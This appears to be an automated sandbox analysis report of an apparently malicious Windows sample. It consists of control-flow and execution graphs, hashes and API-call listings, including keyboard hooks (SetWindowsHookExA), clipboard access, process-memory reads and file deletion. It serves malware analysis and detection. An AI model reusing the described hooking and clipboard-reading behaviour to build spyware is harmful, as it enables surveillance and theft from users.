                                                                                  control_flow_graph 0 54360d0-54360ea 1 54360f1-5436148 call 5436782 0->1 2 54360ec 0->2 7 543614e-5436156 1->7 2->1 8 543615e-5436164 7->8 9 5436166 8->9 10 543616d-543616e 8->10 9->10 11 54362c7-54362d6 9->11 12 5436377-54364d4 9->12 13 54363f6-54363f7 9->13 14 5436408-5436411 9->14 15 54361cf-5436230 9->15 16 54363fc-543644d 9->16 10->11 11->8 12->8 25 54364da-54364e0 12->25 19 5436413 14->19 20 543641a-5436422 14->20 15->8 16->8 19->20 22 5436520-5436530 19->22 23 54361b7-54361c7 19->23 20->8 23->8 25->8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.336116685.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5430000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ,$/$2$3
                                                                                  • API String ID: 0-207288900
                                                                                  • Opcode ID: 926d59e7f626398b4ad2b5f89fb683d394cfdc2b564c452a5cf19f734ae036d8
                                                                                  • Instruction ID: 0dd86723c1af5785d16dc581299da41966b7d08ee56941385ddfe59a5e13256a
                                                                                  • Opcode Fuzzy Hash: 926d59e7f626398b4ad2b5f89fb683d394cfdc2b564c452a5cf19f734ae036d8
                                                                                  • Instruction Fuzzy Hash: 61312E70D0520AEBDF24CFA6C9466EEFBB7BB8E300F11912AD41A67265C7345942CF48
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 054334F8 Relevance: .1, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.336116685.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5430000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 199bd4bdf504fac21d247d800029e6a4e29fe7d0a6496897eb34e563a61dca68
                                                                                  • Instruction ID: b7c4c780f477082de43483dfef50ee1f4f4f29fdfc94dacb3aba2dd661c905e0
                                                                                  • Opcode Fuzzy Hash: 199bd4bdf504fac21d247d800029e6a4e29fe7d0a6496897eb34e563a61dca68
                                                                                  • Instruction Fuzzy Hash: 8531AA71D056288BEB28CF2BC8457D9BAF7AFC9301F14C4FA841DA6264DB740A85CF40
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 05433418 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 113 5433418-54334a5 ReadProcessMemory 116 54334a7-54334ad 113->116 117 54334ae-54334de 113->117 116->117
                                                                                  APIs
                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05433498
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.336116685.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5430000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessRead
                                                                                  • String ID:
                                                                                  • API String ID: 1726664587-0
                                                                                  • Opcode ID: 566d00aa74185366ca0e20aacc9bd0fb12cbdf3e7f86590f4e8c97aa3b145ee7
                                                                                  • Instruction ID: 614f698959a3578b5eed2c742432c01688c4d0a3f8d2d1f6b7a64b36f42373ce
                                                                                  • Opcode Fuzzy Hash: 566d00aa74185366ca0e20aacc9bd0fb12cbdf3e7f86590f4e8c97aa3b145ee7
                                                                                  • Instruction Fuzzy Hash: 67212875D003099FCB10CFAAC8846EEBBF5FF48324F54842AE519A7250C7799945CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02662899 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 121 2662899-26628e8 call 26626d0 call 2662728 126 26628ee 121->126 127 26628ea-26628ec 121->127 128 26628f3-26628fb 126->128 127->128 129 2662957-2662969 128->129 130 26628fd-266292e RtlEncodePointer 128->130 132 2662937-266294d 130->132 133 2662930-2662936 130->133 132->129 133->132
                                                                                  APIs
                                                                                  • RtlEncodePointer.NTDLL(00000000), ref: 0266291D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.331821978.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2660000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: EncodePointer
                                                                                  • String ID:
                                                                                  • API String ID: 2118026453-0
                                                                                  • Opcode ID: 5a1a62d38103f2b30ee2faf6041177522c98886698dee6218dae16d7ea64d593
                                                                                  • Instruction ID: ce3e85722eaacac0cda9e05ee17be0e390b34f31be57edf86255faf65cdca773
                                                                                  • Opcode Fuzzy Hash: 5a1a62d38103f2b30ee2faf6041177522c98886698dee6218dae16d7ea64d593
                                                                                  • Instruction Fuzzy Hash: 0521ACB1A003458FDB20DFAAD9987EEBFF4EB48314F108469C894A7240C7B99945CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 026625E8 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 135 26625e8-26625f6 136 26625fc-266263a 135->136 137 26625f8-26625fb 135->137 140 2662640 136->140 141 266263c-266263e 136->141 137->136 142 2662645-2662650 140->142 141->142 143 2662652-2662683 RtlEncodePointer 142->143 144 26626b1-26626be 142->144 146 2662685-266268b 143->146 147 266268c-26626ac 143->147 146->147 147->144
                                                                                  APIs
                                                                                  • RtlEncodePointer.NTDLL(00000000), ref: 02662672
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.331821978.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2660000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: EncodePointer
                                                                                  • String ID:
                                                                                  • API String ID: 2118026453-0
                                                                                  • Opcode ID: 287a64d2d042092c8add7f630f6e46be812782e51090bca241ba2b07e82478f4
                                                                                  • Instruction ID: 2be65e135856fdf5178fc381eec1503b836d7d1e449e944cea072a898c262775
                                                                                  • Opcode Fuzzy Hash: 287a64d2d042092c8add7f630f6e46be812782e51090bca241ba2b07e82478f4
                                                                                  • Instruction Fuzzy Hash: A221CDB29003458FCB60DF6AD95879EBBF4EB04318F208029D818E3242C7796986CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 026625F8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 149 26625f8-266263a 153 2662640 149->153 154 266263c-266263e 149->154 155 2662645-2662650 153->155 154->155 156 2662652-2662683 RtlEncodePointer 155->156 157 26626b1-26626be 155->157 159 2662685-266268b 156->159 160 266268c-26626ac 156->160 159->160 160->157
                                                                                  APIs
                                                                                  • RtlEncodePointer.NTDLL(00000000), ref: 02662672
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.331821978.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2660000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID: EncodePointer
                                                                                  • String ID:
                                                                                  • API String ID: 2118026453-0
                                                                                  • Opcode ID: 39f94376b50ab57cc978196782942911c5824634a552fdb937a1b8f5a5d737ab
                                                                                  • Instruction ID: fcb297c02c10aee529a744560bde9e9928d7fdbbb4fe44474ae3997438161c41
                                                                                  • Opcode Fuzzy Hash: 39f94376b50ab57cc978196782942911c5824634a552fdb937a1b8f5a5d737ab
                                                                                  • Instruction Fuzzy Hash: 51116AB29002098FDB60DF9AD5487AEBBF8FB44314F608429D819A3741C7B969858FA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00C5D678 Relevance: .1, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.331509247.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c5d000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6fed8a772b774fbce450fd5cb7dac9efd4754d68b4193acc3b74bf089abfd90a
                                                                                  • Instruction ID: c1af3be03c3b554ef89bddf64e5623f9ea009d3e2ee63fb7c8f4c1a02a867cf7
                                                                                  • Opcode Fuzzy Hash: 6fed8a772b774fbce450fd5cb7dac9efd4754d68b4193acc3b74bf089abfd90a
                                                                                  • Instruction Fuzzy Hash: 5E21277A500340DFCF25CF14D9C0B16BF65FB9C315F248669EC0A0A25AC33AD89ACB66
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00C5D4A0 Relevance: .1, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.331509247.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c5d000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2227860bbb5a243a06995f739f35036e805f0fdfc7a8dc17ff8a0820892a95d0
                                                                                  • Instruction ID: d8a1c33b3438350820c07769f93d461eb750e2c5817c5aebddf35893d97ecb7f
                                                                                  • Opcode Fuzzy Hash: 2227860bbb5a243a06995f739f35036e805f0fdfc7a8dc17ff8a0820892a95d0
                                                                                  • Instruction Fuzzy Hash: 482138B9500340DFDB25CF18D9C0B16BF65FB94315F648569DC060B216C336D889C7A2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00C5D673 Relevance: .1, Instructions: 58COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.331509247.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c5d000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 57579a75ee6befb3812fde9df4a5292aa026fa4f580f003769344605979a8ca1
                                                                                  • Instruction ID: 2209d04a8f2cd5dab0d014af1aae8a6999ec193f3e45a732f8292d3832a0ebe2
                                                                                  • Opcode Fuzzy Hash: 57579a75ee6befb3812fde9df4a5292aa026fa4f580f003769344605979a8ca1
                                                                                  • Instruction Fuzzy Hash: 4C21D57A404280DFCF16CF10D9C4B16BF71FB88314F248699DC494B21AC33AD59ACB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00C5D49B Relevance: .1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.331509247.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c5d000_izwFjkhFJm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                  • Instruction ID: 2bbdf4cbe1f27d64f11cbd4a267b923d576f7eef0ef7e06b058245a316ee641b
                                                                                  • Opcode Fuzzy Hash: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                  • Instruction Fuzzy Hash: 0F11E1B6404380CFCB12CF04D9C0B16BF71FB84324F2886A9DC050B216C33AD99ACBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:14.8%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0.6%
                                                                                  Total number of Nodes:528
                                                                                  Total number of Limit Nodes:62
                                                                                  execution_graph 37862 73e7b38 37863 73e7b9e 37862->37863 37864 73e7c4d 37863->37864 37867 73e7cf8 37863->37867 37870 73e7ce8 37863->37870 37873 73e76dc 37867->37873 37871 73e7d26 37870->37871 37872 73e76dc DuplicateHandle 37870->37872 37871->37864 37872->37871 37874 73e7d60 DuplicateHandle 37873->37874 37875 73e7d26 37874->37875 37875->37864 37876 18e0448 37877 18e044d 37876->37877 37878 18e048f 37877->37878 37884 6fc4fc8 37877->37884 37888 6fc4fb9 37877->37888 37892 18e0b48 37877->37892 37902 18e0b58 37877->37902 37912 18e100a 37877->37912 37885 6fc4fd7 37884->37885 37927 6fc4774 37885->37927 37889 6fc4fde 37888->37889 37890 6fc4774 8 API calls 37889->37890 37891 6fc4ff7 37890->37891 37891->37877 37893 18e0adc 37892->37893 37894 18e0b4b 37892->37894 37893->37877 37894->37893 37900 18e100a 8 API calls 37894->37900 38046 18e1018 37894->38046 38052 6fc1870 37894->38052 38061 6fc1820 37894->38061 38067 6fc180f 37894->38067 38074 73e0448 37894->38074 38080 73e0438 37894->38080 37900->37894 37904 18e0b78 37902->37904 37903 18e0dfe 37903->37877 37904->37903 37905 18e100a 8 API calls 37904->37905 37906 18e1018 8 API calls 37904->37906 37907 73e0438 7 API calls 37904->37907 37908 73e0448 7 API calls 37904->37908 37909 6fc180f SetWindowsHookExA 37904->37909 37910 6fc1870 SetWindowsHookExA 37904->37910 37911 6fc1820 SetWindowsHookExA 37904->37911 37905->37904 37906->37904 37907->37904 37908->37904 37909->37904 37910->37904 37911->37904 37914 18e1017 37912->37914 37917 18e0e26 37912->37917 37913 18e0b58 8 API calls 37913->37914 37914->37913 37915 18e112a 37914->37915 37922 18ef8bf 8 API calls 37914->37922 37923 18e112f 8 API calls 37914->37923 37915->37877 37916 18e0fff 37916->37877 37917->37916 37918 73e0438 7 API calls 37917->37918 37919 73e0448 7 API calls 37917->37919 37920 18e100a 8 API calls 37917->37920 37921 18e1018 8 API calls 37917->37921 37924 6fc180f SetWindowsHookExA 37917->37924 37925 6fc1870 SetWindowsHookExA 37917->37925 37926 6fc1820 SetWindowsHookExA 37917->37926 37918->37917 37919->37917 37920->37917 37921->37917 37922->37914 37923->37914 37924->37917 37925->37917 37926->37917 37928 6fc477f 37927->37928 37931 6fc5074 37928->37931 37930 6fc54d6 37932 6fc507f 37931->37932 37933 6fc57dd 37932->37933 37936 6fc6fb8 37932->37936 37941 6fc6fa8 37932->37941 37933->37930 37937 6fc6fd9 37936->37937 37938 6fc6ffd 37937->37938 37946 6fc7168 37937->37946 37950 6fc7157 37937->37950 37938->37933 37942 6fc6fd9 37941->37942 37943 6fc6ffd 37942->37943 37944 6fc7168 8 API calls 37942->37944 37945 6fc7157 8 API calls 37942->37945 37943->37933 37944->37943 37945->37943 37948 6fc7175 37946->37948 37947 6fc71ae 37947->37938 37948->37947 37954 6fc5d24 37948->37954 37951 6fc716a 37950->37951 37952 6fc71ae 37951->37952 37953 6fc5d24 8 API calls 37951->37953 37952->37938 37953->37952 37955 6fc5d2f 37954->37955 37957 6fc7220 37955->37957 37958 6fc5d58 37955->37958 37957->37957 37959 6fc5d63 37958->37959 37965 6fc5d68 37959->37965 37961 6fc728f 37969 6fcb490 37961->37969 37978 6fcb478 37961->37978 37962 6fc72c8 37962->37957 37966 6fc5d73 37965->37966 37967 6fc79c4 37966->37967 37968 6fc6fb8 8 API calls 37966->37968 37967->37961 37968->37967 37971 6fcb4c1 37969->37971 37973 6fcb5b2 37969->37973 37970 6fcb4cd 37970->37962 37971->37970 37986 6fcb6f8 37971->37986 37989 6fcb6e8 37971->37989 37972 6fcb50d 37992 73e2368 37972->37992 38003 73e2359 37972->38003 37973->37962 37979 6fcb482 37978->37979 37980 6fcb4cd 37979->37980 37982 6fcb6f8 5 API calls 37979->37982 37983 6fcb6e8 5 API calls 37979->37983 37980->37962 37981 6fcb50d 37984 73e2368 6 API calls 37981->37984 37985 73e2359 6 API calls 37981->37985 37982->37981 37983->37981 37984->37980 37985->37980 38014 6fcb728 37986->38014 37987 6fcb702 37987->37972 37990 6fcb702 37989->37990 37991 6fcb728 5 API calls 37989->37991 37990->37972 37991->37990 37993 73e2392 37992->37993 38023 73e1f58 37993->38023 37996 73e2410 37997 73e1f68 GetModuleHandleW 37996->37997 37999 73e2439 37996->37999 37998 73e2463 37997->37998 38001 73e5320 CreateWindowExW 37998->38001 38002 73e5310 CreateWindowExW CreateWindowExW 37998->38002 38001->37999 38002->37999 38004 73e232d 38003->38004 38004->38003 38005 73e1f58 DeleteFileW 38004->38005 38006 73e23f4 38005->38006 38011 73e3848 3 API calls 38006->38011 38007 73e2410 38010 73e2439 38007->38010 38042 73e1f68 38007->38042 38011->38007 38017 73e4008 GetModuleHandleW GetModuleHandleW 38014->38017 38018 73e1f68 GetModuleHandleW 38014->38018 38019 73e4339 GetModuleHandleW 38014->38019 38020 73e3ff7 GetModuleHandleW GetModuleHandleW 38014->38020 38015 6fcb74b 38016 6fcb75b 38015->38016 38021 6fcbb38 LoadLibraryExW 38015->38021 38022 6fcbb29 LoadLibraryExW 38015->38022 38016->37987 38017->38015 38018->38015 38019->38015 38020->38015 38021->38016 38022->38016 38024 73e1f63 38023->38024 38025 73e1f74 DeleteFileW 38024->38025 38026 73e23f4 38024->38026 38025->38026 38027 73e3848 38026->38027 38028 73e3875 38027->38028 38029 73e38f6 38028->38029 38030 73e4008 GetModuleHandleW GetModuleHandleW 38028->38030 38031 73e3ff7 GetModuleHandleW GetModuleHandleW 38028->38031 38030->38029 38031->38029 38032 73e5320 38033 73e205c CreateWindowExW 38032->38033 38034 73e5355 38033->38034 38034->38010 38035 73e5310 38036 73e535e CreateWindowExW 38035->38036 38037 73e5326 38035->38037 38041 73e5494 38036->38041 38038 73e5355 38037->38038 38039 73e205c CreateWindowExW 38037->38039 38038->38010 38039->38038 38043 73e4340 GetModuleHandleW 38042->38043 38045 73e2463 38043->38045 38045->38032 38045->38035 38048 18e101f 38046->38048 38047 18e0b58 8 API calls 38047->38048 38048->38047 38049 18e112a 38048->38049 38086 18ef8bf 38048->38086 38093 18e112f 38048->38093 38049->37894 38053 6fc1828 38052->38053 38056 6fc187f 38052->38056 38054 6fc186d 38053->38054 38059 6fc1870 SetWindowsHookExA 38053->38059 38146 6fc1880 38053->38146 38150 6fc1902 38053->38150 38054->37894 38055 6fc1900 38055->37894 38056->38055 38154 6fc01f8 38056->38154 38059->38053 38062 6fc1828 38061->38062 38063 6fc186d 38062->38063 38064 6fc1880 SetWindowsHookExA 38062->38064 38065 6fc1870 SetWindowsHookExA 38062->38065 38066 6fc1902 SetWindowsHookExA 38062->38066 38063->37894 38064->38062 38065->38062 38066->38062 38068 6fc181f 38067->38068 38069 6fc17af 38067->38069 38070 6fc186d 38068->38070 38071 6fc1880 SetWindowsHookExA 38068->38071 38072 6fc1870 SetWindowsHookExA 38068->38072 38073 6fc1902 SetWindowsHookExA 38068->38073 38069->37894 38070->37894 38071->38068 38072->38068 38073->38068 38075 73e045a 38074->38075 38078 73e050f 38075->38078 38158 73e027c 38075->38158 38077 73e04d5 38163 73e029c 38077->38163 38078->37894 38081 73e045a 38080->38081 38082 73e027c 6 API calls 38081->38082 38085 73e050f 38081->38085 38083 73e04d5 38082->38083 38084 73e029c KiUserCallbackDispatcher 38083->38084 38084->38085 38085->37894 38088 18ef8e8 38086->38088 38087 18ef92c 38087->38048 38088->38087 38089 18e0b58 8 API calls 38088->38089 38090 18ef9fa 38089->38090 38091 18e0b58 8 API calls 38090->38091 38092 18efa5e 38091->38092 38094 18e1159 38093->38094 38107 18e1174 38094->38107 38110 18e1740 38094->38110 38116 18e1750 38094->38116 38095 18e1184 38096 18e0b58 8 API calls 38095->38096 38097 18e11a4 38096->38097 38098 18e11d0 38097->38098 38099 18e0b58 8 API calls 38097->38099 38098->38048 38100 18e11c4 38099->38100 38101 18e0b58 8 API calls 38100->38101 38101->38098 38104 18e117c 38104->38095 38134 18edda0 38104->38134 38140 18edd90 38104->38140 38107->38104 38122 18edc38 38107->38122 38128 18edc28 38107->38128 38111 18e1766 38110->38111 38112 18e0b58 8 API calls 38111->38112 38115 18e178a 38112->38115 38113 18e181c 38113->38113 38114 18e0b58 8 API calls 38114->38115 38115->38113 38115->38114 38117 18e1766 38116->38117 38118 18e0b58 8 API calls 38117->38118 38121 18e178a 38118->38121 38119 18e181c 38119->38119 38120 18e0b58 8 API calls 38120->38121 38121->38119 38121->38120 38123 18edc4e 38122->38123 38124 18e0b58 8 API calls 38123->38124 38127 18edc7b 38124->38127 38125 18edcfc 38125->38125 38126 18e0b58 8 API calls 38126->38127 38127->38125 38127->38126 38129 18edc2d 38128->38129 38130 18e0b58 8 API calls 38129->38130 38133 18edc7b 38130->38133 38131 18edcfc 38131->38131 38132 18e0b58 8 API calls 38132->38133 38133->38131 38133->38132 38135 18eddb6 38134->38135 38136 18e0b58 8 API calls 38135->38136 38139 18eddda 38136->38139 38137 18edebe 38137->38137 38138 18e0b58 8 API calls 38138->38139 38139->38137 38139->38138 38141 18edda0 38140->38141 38142 18e0b58 8 API calls 38141->38142 38145 18eddda 38142->38145 38143 18edebe 38143->38143 38144 18e0b58 8 API calls 38144->38145 38145->38143 38145->38144 38148 6fc189d 38146->38148 38147 6fc1900 38147->38053 38148->38147 38149 6fc01f8 SetWindowsHookExA 38148->38149 38149->38148 38152 6fc18bd 38150->38152 38151 6fc1900 38151->38053 38152->38151 38153 6fc01f8 SetWindowsHookExA 38152->38153 38153->38152 38157 6fc2048 SetWindowsHookExA 38154->38157 38156 6fc20d2 38156->38056 38157->38156 38159 73e0287 38158->38159 38160 73e2368 6 API calls 38159->38160 38161 73e2359 6 API calls 38159->38161 38162 73e1c7a 38159->38162 38160->38162 38161->38162 38162->38077 38164 73e02a7 38163->38164 38166 73e924b 38164->38166 38167 73e7934 38164->38167 38166->38078 38168 73ec248 KiUserCallbackDispatcher 38167->38168 38170 73ec2b6 38168->38170 38170->38164 38427 18efb58 38428 18efb5d 38427->38428 38429 18efb7b 38428->38429 38432 18efb80 38428->38432 38443 18efb90 38428->38443 38433 18efba6 38432->38433 38434 18efbbe 38433->38434 38435 18e0b58 8 API calls 38433->38435 38434->38428 38436 18efbda 38435->38436 38437 18e0b58 8 API calls 38436->38437 38438 18efbe6 38437->38438 38439 18e0b58 8 API calls 38438->38439 38442 18efc6c 38438->38442 38440 18efc46 38439->38440 38441 18e0b58 8 API calls 38440->38441 38441->38442 38442->38428 38444 18efba6 38443->38444 38445 18efbbe 38444->38445 38446 18e0b58 8 API calls 38444->38446 38445->38428 38447 18efbda 38446->38447 38448 18e0b58 8 API calls 38447->38448 38449 18efbe6 38448->38449 38450 18e0b58 8 API calls 38449->38450 38453 18efc6c 38449->38453 38451 18efc46 38450->38451 38452 18e0b58 8 API calls 38451->38452 38452->38453 38453->38428 38171 18efca0 38172 18efca5 38171->38172 38173 18efcc3 38172->38173 38179 73e06b3 38172->38179 38185 73e0577 38172->38185 38191 73e0588 38172->38191 38197 73e06f1 38172->38197 38203 73e0750 38172->38203 38181 73e06b8 38179->38181 38180 73e07f2 38180->38172 38182 73e1f58 DeleteFileW 38181->38182 38209 73e37e0 38181->38209 38213 73e3730 38181->38213 38182->38180 38187 73e0588 38185->38187 38186 73e07f2 38186->38172 38187->38186 38188 73e1f58 DeleteFileW 38187->38188 38189 73e3730 DeleteFileW 38187->38189 38190 73e37e0 DeleteFileW 38187->38190 38188->38186 38189->38186 38190->38186 38193 73e05a1 38191->38193 38192 73e07f2 38192->38172 38193->38192 38194 73e1f58 DeleteFileW 38193->38194 38195 73e3730 DeleteFileW 38193->38195 38196 73e37e0 DeleteFileW 38193->38196 38194->38192 38195->38192 38196->38192 38199 73e06f6 38197->38199 38198 73e07f2 38198->38172 38200 73e1f58 DeleteFileW 38199->38200 38201 73e3730 DeleteFileW 38199->38201 38202 73e37e0 DeleteFileW 38199->38202 38200->38198 38201->38198 38202->38198 38205 73e0755 38203->38205 38204 73e07f2 38204->38172 38206 73e1f58 DeleteFileW 38205->38206 38207 73e3730 DeleteFileW 38205->38207 38208 73e37e0 DeleteFileW 38205->38208 38206->38204 38207->38204 38208->38204 38211 73e37f0 38209->38211 38210 73e3828 38210->38180 38211->38210 38218 73e1f74 38211->38218 38214 73e3705 38213->38214 38215 73e373f 38213->38215 38214->38180 38216 73e374b 38215->38216 38217 73e1f74 DeleteFileW 38215->38217 38216->38180 38217->38216 38219 73e39b8 DeleteFileW 38218->38219 38221 73e3a37 38219->38221 38221->38210 38222 73e0850 38225 73e0855 38222->38225 38223 73e0873 38225->38223 38226 73e0888 38225->38226 38227 73e089e 38226->38227 38228 73e094f 38227->38228 38231 73e1310 38227->38231 38236 73e1300 38227->38236 38228->38225 38232 73e1328 38231->38232 38233 73e1c14 38232->38233 38241 73e57b0 38232->38241 38246 73e57a1 38232->38246 38233->38227 38237 73e1328 38236->38237 38238 73e1c14 38237->38238 38239 73e57b0 11 API calls 38237->38239 38240 73e57a1 11 API calls 38237->38240 38238->38227 38239->38237 38240->38237 38243 73e57cd 38241->38243 38242 73e5869 38243->38242 38245 6fcb728 5 API calls 38243->38245 38251 73e5cb8 38243->38251 38245->38243 38248 73e57b0 38246->38248 38247 73e5869 38248->38247 38249 73e5cb8 7 API calls 38248->38249 38250 6fcb728 5 API calls 38248->38250 38249->38248 38250->38248 38253 73e5cd2 38251->38253 38252 73e5d9b 38253->38252 38258 73e5ef0 38253->38258 38270 73e5dc5 38253->38270 38282 73e5dd8 38253->38282 38294 73e6111 38253->38294 38263 73e5df9 38258->38263 38259 73e6140 38259->38253 38260 73e614d 38338 73e2108 38260->38338 38263->38259 38263->38260 38306 73e6373 38263->38306 38313 73e7e30 38263->38313 38319 73e7e1f 38263->38319 38325 73ecef7 38263->38325 38330 73ecf9d 38263->38330 38334 73ecfd0 38263->38334 38275 73e5df9 38270->38275 38271 73e6140 38271->38253 38272 73e614d 38273 73e2108 2 API calls 38272->38273 38274 73e61af 38273->38274 38274->38253 38275->38271 38275->38272 38276 73ecf9d OleGetClipboard 38275->38276 38277 73ecef7 OleGetClipboard 38275->38277 38278 73ecfd0 OleGetClipboard 38275->38278 38279 73e7e1f 3 API calls 38275->38279 38280 73e7e30 3 API calls 38275->38280 38281 73e6373 2 API calls 38275->38281 38276->38275 38277->38275 38278->38275 38279->38275 38280->38275 38281->38275 38287 73e5df9 38282->38287 38283 73e6140 38283->38253 38284 73e614d 38285 73e2108 2 API calls 38284->38285 38286 73e61af 38285->38286 38286->38253 38287->38283 38287->38284 38288 73e6373 2 API calls 38287->38288 38289 73ecf9d OleGetClipboard 38287->38289 38290 73ecef7 OleGetClipboard 38287->38290 38291 73ecfd0 OleGetClipboard 38287->38291 38292 73e7e1f 3 API calls 38287->38292 38293 73e7e30 3 API calls 38287->38293 38288->38287 38289->38287 38290->38287 38291->38287 38292->38287 38293->38287 38299 73e5df9 38294->38299 38295 73e6140 38295->38253 38296 73e614d 38297 73e2108 2 API calls 38296->38297 38298 73e61af 38297->38298 38298->38253 38299->38295 38299->38296 38300 73ecf9d OleGetClipboard 38299->38300 38301 73ecef7 OleGetClipboard 38299->38301 38302 73ecfd0 OleGetClipboard 38299->38302 38303 73e6373 2 API calls 38299->38303 38304 73e7e1f 3 API calls 38299->38304 38305 73e7e30 3 API calls 38299->38305 38300->38299 38301->38299 38302->38299 38303->38299 38304->38299 38305->38299 38308 73e62dc 38306->38308 38307 73e62ec 38307->38263 38308->38306 38308->38307 38309 73e1f58 DeleteFileW 38308->38309 38310 73e64d9 38309->38310 38311 73e1f68 GetModuleHandleW 38310->38311 38312 73e650b 38310->38312 38311->38312 38314 73e7e4d 38313->38314 38315 73e7edd 38314->38315 38346 73e9258 38314->38346 38351 73e9250 38314->38351 38356 73e9260 38314->38356 38315->38263 38321 73e7e4d 38319->38321 38320 73e7edd 38320->38263 38321->38320 38322 73e9258 KiUserCallbackDispatcher 38321->38322 38323 73e9260 KiUserCallbackDispatcher 38321->38323 38324 73e9250 KiUserCallbackDispatcher 38321->38324 38322->38320 38323->38320 38324->38320 38326 73ecf17 38325->38326 38329 73ecf77 38325->38329 38326->38263 38327 73ed07d 38327->38263 38329->38327 38361 73ec628 38329->38361 38331 73ecf87 38330->38331 38331->38330 38332 73ec628 OleGetClipboard 38331->38332 38333 73ed07d 38331->38333 38332->38331 38333->38263 38337 73ecfea 38334->38337 38335 73ec628 OleGetClipboard 38335->38337 38336 73ed07d 